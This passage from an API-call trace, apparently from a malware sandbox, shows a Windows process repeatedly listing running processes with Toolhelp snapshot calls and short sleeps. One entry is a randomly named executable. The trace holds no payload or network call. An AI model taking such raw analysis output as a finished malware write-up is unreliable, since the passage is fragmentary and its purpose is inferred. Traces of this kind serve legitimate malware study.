th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0214.721] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0214.721] Sleep (dwMilliseconds=0x64) [0214.849] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x160 [0214.851] Process32FirstW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.851] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0214.851] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0214.852] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.852] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0214.852] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.853] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0214.853] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0214.853] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0214.854] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0214.854] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.854] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.855] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.855] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.855] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.856] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0214.856] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.856] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.857] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0214.857] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0214.857] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0214.858] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0214.858] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0214.858] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.859] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0214.859] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0214.859] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0214.860] Process32NextW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0214.860] Sleep (dwMilliseconds=0x64) [0215.048] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x164 [0215.049] Process32FirstW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.050] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0215.050] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0215.050] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.051] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0215.051] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.051] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0215.052] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0215.052] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0215.052] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0215.053] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.053] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.053] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.054] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.054] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.054] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0215.055] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.055] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.055] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0215.056] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0215.056] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.056] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0215.057] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0215.057] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.057] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0215.058] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0215.058] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0215.058] Process32NextW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0215.059] Sleep (dwMilliseconds=0x64) [0215.209] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x168 [0215.210] Process32FirstW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.211] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0215.211] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0215.211] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.212] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0215.212] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.212] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0215.213] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0215.213] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0215.213] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0215.214] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.214] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.214] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.215] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.215] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.215] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0215.216] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.216] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.217] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0215.217] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0215.217] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.217] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0215.218] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0215.218] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.218] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, 